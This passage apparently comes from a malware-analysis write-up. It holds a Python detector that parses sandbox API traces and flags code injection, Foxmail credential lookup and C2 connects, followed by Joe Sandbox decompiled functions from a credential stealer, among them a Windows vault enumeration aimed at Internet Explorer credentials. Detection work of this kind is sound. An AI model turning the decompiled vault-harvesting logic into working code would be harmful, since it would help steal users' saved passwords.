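GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?), ref: 0043F79D
lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F7AB
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00438A5B
RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,004467A0,?), ref: 00438A82
WSAStartup.WS2_32(00000202,?), ref: 0043D361
socket.WS2_32(00000002,00000001,00000000), ref: 0043D372
gethostbyname.WS2_32(?), ref: 0043D380
connect.WS2_32(00000000,?,00000010), ref: 0043D3B9
"""

# "api.MODULE(arg,...), ref: ADDR"; the bullet and any "Part of subcall function XXXX:"
# prefix the report adds are stripped first.
LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
PREFIX_RE = re.compile(r"^[\s•]*(?:Part of subcall function \w+:\s*)?")


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for an 8-hex-digit value, None for '?', str for a string literal
    ref: int     # call-site address


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):   # a string literal of exactly 8 hex chars would be misread
        return int(tok, 16)
    return tok


def parse_trace(text):
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(PREFIX_RE.sub("", raw, count=1))
        if not m:
            continue   # headings, "Strings", dump sources and similar lines
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def classify(calls):
    """Map each call to behaviour tags; every tag lists the call sites that triggered it."""
    tags = {}

    def tag(name, c):
        tags.setdefault(name, []).append(c.ref)

    for c in calls:
        a = c.args
        if c.api == "VirtualAlloc" and len(a) > 3 and a[3] == PAGE_EXECUTE_READWRITE:
            tag("rwx_alloc", c)                       # flProtect
        elif c.api == "VirtualProtect" and len(a) > 2 and a[2] == PAGE_EXECUTE_READWRITE:
            tag("rwx_protect", c)                     # flNewProtect
        elif c.api == "RegOpenKeyExA" and a and a[0] == HKEY_CURRENT_USER and any(
                isinstance(x, str) and "Aerofox\\FoxmailPreview" in x for x in a):
            tag("foxmail_config_lookup", c)
        elif c.api == "socket" and a[:2] == [AF_INET, SOCK_STREAM]:
            tag("tcp_socket", c)
        elif c.api == "connect" and c.module == "WS2_32":
            tag("outbound_connect", c)
        elif c.api == "gethostbyname":
            tag("dns_resolve", c)
        if any(isinstance(x, str) and x.lower().endswith("cmd.exe") for x in a):
            tag("references_cmd_exe", c)
    return tags


def findings(tags):
    """Combine tags into the higher-level behaviours worth reporting."""
    seen = set(tags)
    out = []
    if ({"rwx_alloc", "rwx_protect"} & seen) and "references_cmd_exe" in seen:
        out.append("RWX memory prepared next to a \\System32\\cmd.exe path: code injection into a cmd.exe host is the likely intent")
    if "foxmail_config_lookup" in seen:
        out.append("Foxmail install path read from HKCU: consistent with mail-client credential theft")
    if {"tcp_socket", "outbound_connect"} <= seen:
        out.append("raw Winsock TCP connect" + (" after gethostbyname" if "dns_resolve" in seen else "") + ": C2 beacon candidate")
    return out


if __name__ == "__main__":
    for f in findings(classify(parse_trace(SAMPLE_TRACE))):
        print("-", f)
```

Running the block against the constructed trace yields all three findings. The parser deliberately keeps unresolved "?" arguments as None rather than dropping them, so positional checks such as "flProtect is the fourth argument" stay aligned with the Win32 prototypes even when the sandbox could not recover a value.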

                                      C-Code - Quality: 100%
                                      			E0043EC17(signed int* __ecx, void* __edx) {
                                      				/* Resolves a PID (__edx) to its image name. _v560 is a PROCESSENTRY32W
                                      				   (dwSize = 0x22c); _v552 is its th32ProcessID (offset 8) and _v524 its
                                      				   szExeFile (offset 36). The matching entry's name is handed to E00433412
                                      				   together with __ecx; if no entry matches, *__ecx is zeroed. */
                                      				char _v524;
                                      				intOrPtr _v552;
                                      				void* _v560;
                                      				struct tagPROCESSENTRY32W* _t8;
                                      				void* _t14;
                                      				void* _t18;
                                      				signed int* _t19;
                                      
                                      				_t14 = __edx;
                                      				_v560 = 0x22c;
                                      				_t19 = __ecx;
                                      				_t18 = CreateToolhelp32Snapshot(2, 0);   /* TH32CS_SNAPPROCESS */
                                      				if(_t18 == 0xffffffff) {   /* INVALID_HANDLE_VALUE */
                                      					L6:
                                      					 *_t19 =  *_t19 & 0x00000000;
                                      				} else {
                                      					_t8 =  &_v560;
                                      					Process32FirstW(_t18, _t8);
                                      					while(_t8 != 0) {
                                      						if(_v552 == _t14) {   /* th32ProcessID == wanted PID */
                                      							CloseHandle(_t18);
                                      							E00433412(_t19,  &_v524);   /* copy szExeFile out */
                                      						} else {
                                      							_t8 = Process32NextW(_t18,  &_v560);
                                      							continue;
                                      						}
                                      						goto L7;
                                      					}
                                      					CloseHandle(_t18);
                                      					goto L6;
                                      				}
                                      				L7:
                                      				return _t19;
                                      			}
                                      0x0043ec27
                                      0x0043ec29
                                      0x0043ec33
                                      0x0043ec3b
                                      0x0043ec40
                                      0x0043ec73
                                      0x0043ec73
                                      0x0043ec42
                                      0x0043ec42
                                      0x0043ec4a
                                      0x0043ec68
                                      0x0043ec58
                                      0x0043ec7e
                                      0x0043ec8d
                                      0x0043ec5a
                                      0x0043ec62
                                      0x00000000
                                      0x0043ec62
                                      0x00000000
                                      0x0043ec58
                                      0x0043ec6d
                                      0x00000000
                                      0x0043ec6d
                                      0x0043ec77
                                      0x0043ec7c

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043EC35
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0043EC4A
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0043EC62
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EC6D
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EC7E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: 930a36f03503a4ea6ecc1c729fa0a81d5e552ffdca14f734a6d56a4347d41b84
                                      • Instruction ID: 0585f3969ccf14d8b38e3a8e6ed8769177a4677a00fd7f4f3b1f66289f023fc5
                                      • Opcode Fuzzy Hash: 930a36f03503a4ea6ecc1c729fa0a81d5e552ffdca14f734a6d56a4347d41b84
                                      • Instruction Fuzzy Hash: 8801D631601218ABD7305BA6AC4CB7F76BCEB4A725F1010BAF615D21D0D7B88D41CA59
                                      Uniqueness

                                      Uniqueness Score: 0.68%

                                      APIs
                                      • _free.LIBCMT ref: 00CC982D
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC983F
                                      • _free.LIBCMT ref: 00CC9851
                                      • _free.LIBCMT ref: 00CC9863
                                      • _free.LIBCMT ref: 00CC9875
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: dc1b053296ea4955b1c1565d79abc4dd918889867181ea31fd3d272fcce336a0
                                      • Instruction ID: 43b498d3104b70e4fb4e41f7068630b40babed80604fabf2f295ae00f62eedbc
                                      • Opcode Fuzzy Hash: dc1b053296ea4955b1c1565d79abc4dd918889867181ea31fd3d272fcce336a0
                                      • Instruction Fuzzy Hash: A6F01233504344EB8660DB54EAC9F2E73D9FE49714B54081DF05DDBA91CB30FD808A60
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0043A64F(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xb4));
                                      				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				FreeLibrary( *(_t18 + 0xac));
                                      				 *(_t18 + 0xac) = 0;
                                      				FreeLibrary( *(_t18 + 0xb8));
                                      				 *(_t18 + 0xb8) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				return _t15;
                                      			}
                                      0x0043a658
                                      0x0043a660
                                      0x0043a66a
                                      0x0043a670
                                      0x0043a678
                                      0x0043a67e
                                      0x0043a686
                                      0x0043a68c
                                      0x0043a694
                                      0x0043a69a
                                      0x0043a69c
                                      0x0043a6a5

                                      APIs
                                      • FreeLibrary.KERNEL32(?,00000001,?,00000000,00439DD8), ref: 0043A660
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A670
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A67E
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A68C
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A69A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction ID: 94c92cf5200aa24d7ead679483254c927c16e466122c1acebb6344d874c6b208
                                      • Opcode Fuzzy Hash: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction Fuzzy Hash: 86F0AEB5B01B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0043A2CD(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xb4));
                                      				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				FreeLibrary( *(_t18 + 0xac));
                                      				 *(_t18 + 0xac) = 0;
                                      				FreeLibrary( *(_t18 + 0xb8));
                                      				 *(_t18 + 0xb8) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				return _t15;
                                      			}
                                      0x0043a2d6
                                      0x0043a2de
                                      0x0043a2e8
                                      0x0043a2ee
                                      0x0043a2f6
                                      0x0043a2fc
                                      0x0043a304
                                      0x0043a30a
                                      0x0043a312
                                      0x0043a318
                                      0x0043a31a
                                      0x0043a323

                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2DE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2EE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2FC
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A30A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A318
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction ID: 94c92cf5200aa24d7ead679483254c927c16e466122c1acebb6344d874c6b208
                                      • Opcode Fuzzy Hash: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction Fuzzy Hash: 86F0AEB5B01B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 61%
                                      			E00439EA9(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _t124;
                                      				void* _t127;
                                      				intOrPtr _t129;
                                      				void* _t133;
                                      				intOrPtr _t147;
                                      				void* _t148;
                                      				void* _t159;
                                      				void* _t162;
                                      				void* _t186;
                                      				char _t226;
                                      				intOrPtr _t229;
                                      				char _t234;
                                      				void* _t235;
                                      
                                      				_t234 = 0;
                                      				_t186 = __ecx;
                                      				_t226 = 0;
                                      				_v16 = 0;
                                      				_v44 = 0;
                                      				_v20 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				_v84 = 0;
                                      				if(E0043A1FF(__ecx) != 0) {
                                      					_push( &_v16);
                                      					_push(0);
                                      					_push(0x446140);
                                      					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                      						_push( &_v20);
                                      						_push( &_v44);
                                      						_push(0x200);
                                      						_push(_v16);
                                      						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
                                      							_t240 = _v44;
                                      							if(_v44 != 0) {
                                      								_v80 = 0;
                                      								_v40 = 0;
                                      								_v36 = 0;
                                      								do {
                                      									_t124 = E0043A1CC(_t240);
                                      									_push(0x10);
                                      									_push(0x446130);
                                      									if(_t124 == 0) {
                                      										_push(_t226);
                                      										_v28 = _v20 + _v40;
                                      										_t127 = E00431000();
                                      										_t235 = _t235 + 0xc;
                                      										__eflags = _t127;
                                      										if(__eflags == 0) {
                                      											E00433412( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                      											_t133 = E00433075( &_v32, E00433412( &_v64, L"Internet Explorer"));
                                      											E00435A2D(_v64);
                                      											_v64 = _t234;
                                      											__eflags = _t133;
                                      											if(__eflags != 0) {
                                      												asm("movaps xmm0, [0x4449c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E00433264( &_v100, E00433412( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                      												E00435A2D(_v68);
                                      												_v68 = _t234;
                                      												E00433264( &_v96, E00433412( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                      												E00435A2D(_v72);
                                      												_v12 = _t234;
                                      												_t147 = _v28;
                                      												_v72 = _t234;
                                      												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                      												__eflags = _t148;
                                      												if(_t148 == 0) {
                                      													_v8 = _v12;
                                      													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                      													E00433264( &_v84, E00433412( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                      													E00435A2D(_v76);
                                      													_v76 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00431EB9(_t235,  &_v100);
                                      												E00431EEF(_t186);
                                      												E0043138F( &_v100);
                                      											}
                                      											E00435A2D(_v32);
                                      											_v32 = _t234;
                                      											goto L18;
                                      										}
                                      									} else {
                                      										_t226 = _v36 + _v20;
                                      										_push(_t226);
                                      										_v8 = _t226;
                                      										_t159 = E00431000();
                                      										_t235 = _t235 + 0xc;
                                      										if(_t159 == 0) {
                                      											E00433412( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                      											_t162 = E00433075( &_v24, E00433412( &_v48, L"Internet Explorer"));
                                      											E00435A2D(_v48);
                                      											_v48 = _t234;
                                      											if(_t162 != 0) {
                                      												_t229 = _v8;
                                      												asm("movaps xmm0, [0x4449c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E00433264( &_v100, E00433412( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                      												E00435A2D(_v52);
                                      												_v52 = _t234;
                                      												E00433264( &_v96, E00433412( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                      												E00435A2D(_v56);
                                      												_v12 = _t234;
                                      												_push( &_v12);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push( *((intOrPtr*)(_t229 + 0x18)));
                                      												_v56 = _t234;
                                      												_push( *((intOrPtr*)(_t229 + 0x14)));
                                      												_push(_t229);
                                      												_push(_v16);
                                      												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
                                      													_v8 = _v12;
                                      													E00433264( &_v92, E00433412( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                      													E00435A2D(_v60);
                                      													_v60 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00431EB9(_t235,  &_v100);
                                      												E00431EEF(_t186);
                                      												E0043138F( &_v100);
                                      											}
                                      											E00435A2D(_v24);
                                      											_v24 = _t234;
                                      											L18:
                                      											_t226 = _v8;
                                      										}
                                      									}
                                      									_v36 = _v36 + 0x38;
                                      									_t129 = _v80 + 1;
                                      									_v40 = _v40 + 0x34;
                                      									_v80 = _t129;
                                      								} while (_t129 < _v44);
                                      								_t234 = _v84;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				if(_v20 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
                                      				}
                                      				if(_v16 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
                                      				}
                                      				FreeLibrary( *(_t186 + 0xc0));
                                      				E00435A2D(_t234);
                                      				E00435A2D(0);
                                      				return E00435A2D(0);
                                      			}
                                      0x00439eb1
                                      0x00439eb3
                                      0x00439eb6
                                      0x00439eb8
                                      0x00439ebb
                                      0x00439ebe
                                      0x00439ec1
                                      0x00439ec4
                                      0x00439ec7
                                      0x00439ed1
                                      0x00439eda
                                      0x00439edb
                                      0x00439edc
                                      0x00439ee9
                                      0x00439ef2
                                      0x00439ef6
                                      0x00439ef7
                                      0x00439efc
                                      0x00439f07
                                      0x00439f10
                                      0x00439f12
                                      0x00439f18
                                      0x00439f1b
                                      0x00439f1e
                                      0x00439f21
                                      0x00439f21
                                      0x00439f26
                                      0x00439f28
                                      0x00439f2f
                                      0x0043a053
                                      0x0043a054
                                      0x0043a057
                                      0x0043a05c
                                      0x0043a05f
                                      0x0043a061
                                      0x0043a070
                                      0x0043a086
                                      0x0043a090

                                      APIs
                                        • Part of subcall function 0043A1FF: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0043A207
                                      • FreeLibrary.KERNEL32(?), ref: 0043A1AC
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433075: lstrcmpW.KERNEL32(?,?), ref: 0043307F
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                      • String ID: 4$8$Internet Explorer
                                      • API String ID: 708496175-747916358
                                      • Opcode ID: 3c4322b67de8ebc5cacba07c452e2559112fbb2b6ce99fb86eb22c9d67367b44
                                      • Instruction ID: 6f9550cf1afbcc4934a44d76ce0573cadb2561ed40d24f0eee435d9f13fd994d
                                      • Opcode Fuzzy Hash: 3c4322b67de8ebc5cacba07c452e2559112fbb2b6ce99fb86eb22c9d67367b44
                                      • Instruction Fuzzy Hash: 4CA15171D00219ABCF04EFE6D8869EEBB79FF18304F10511AF411A7252DB38AE51CB98
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 58%
                                      			E0043D9DD() {
                                      				intOrPtr _v6;
                                      				signed int _v12;
                                      				intOrPtr _v272;
                                      				intOrPtr _v280;
                                      				intOrPtr _v284;
                                      				char _v288;
                                      				struct HINSTANCE__* _t33;
                                      				intOrPtr _t35;
                                      				intOrPtr _t38;
                                      				intOrPtr _t53;
                                      				intOrPtr _t62;
                                      				_Unknown_base(*)()* _t69;
                                      				void* _t71;
                                      
                                      				_v288 = 0x11c;
                                      				_t33 = LoadLibraryA("ntdll.dll");
                                      				if(_t33 == 0) {
                                      					L3:
                                      					_t71 = 2;
                                      					if(_v272 != _t71) {
                                      						goto L43;
                                      					} else {
                                      						_t35 = _v6;
                                      						if(_t35 != 1) {
                                      							if(_t35 == 2 || _t35 == 3) {
                                      								if(_v284 != 5) {
                                      									if(_v284 != 6) {
                                      										if(_v284 != 0xa || _v280 != 0) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x2710;
                                      										}
                                      									} else {
                                      										_t38 = _v280;
                                      										if(_t38 != 0) {
                                      											if(_t38 != 1) {
                                      												if(_t38 != _t71) {
                                      													if(_t38 != 3) {
                                      														goto L43;
                                      													} else {
                                      														return (_v12 & 0x0000ffff) + 0x189c;
                                      													}
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x1838;
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x17d4;
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1770;
                                      										}
                                      									}
                                      								} else {
                                      									if(_v280 != 1) {
                                      										if(_v280 != _t71) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1450;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x13ec;
                                      									}
                                      								}
                                      							} else {
                                      								goto L43;
                                      							}
                                      						} else {
                                      							if(_v284 != 5) {
                                      								if(_v284 != 6) {
                                      									if(_v284 != 0xa || _v280 != 0) {
                                      										goto L43;
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x3e8;
                                      									}
                                      								} else {
                                      									_t53 = _v280;
                                      									if(_t53 != 0) {
                                      										if(_t53 != 1) {
                                      											if(_t53 != _t71) {
                                      												if(_t53 != 3) {
                                      													goto L43;
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x276;
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x26c;
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x262;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x258;
                                      									}
                                      								}
                                      							} else {
                                      								_t62 = _v280;
                                      								if(_t62 != 0) {
                                      									if(_t62 != 1) {
                                      										if(_t62 != _t71) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x208;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x1fe;
                                      									}
                                      								} else {
                                      									return (_v12 & 0x0000ffff) + 0x1f4;
                                      								}
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					_t69 = GetProcAddress(_t33, "RtlGetVersion");
                                      					if(_t69 == 0) {
                                      						L43:
                                      						return 0;
                                      					} else {
                                      						 *_t69( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D9F5
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043DA05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 76a5073a7846edb3b91941b1267ab84e8671cd69c2d4c3e4bda9aba1e77d5e49
                                      • Instruction ID: 747af0454fbe69a88e51ea9e9e7a4920d5cf8f7954ec772202ecc1886c523a12
                                      • Opcode Fuzzy Hash: 76a5073a7846edb3b91941b1267ab84e8671cd69c2d4c3e4bda9aba1e77d5e49
                                      • Instruction Fuzzy Hash: 9B416E30E0412C96DF248B55E9063FEB7B49B5974DF0418E6E545E02C1E6BCDEC4CAA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
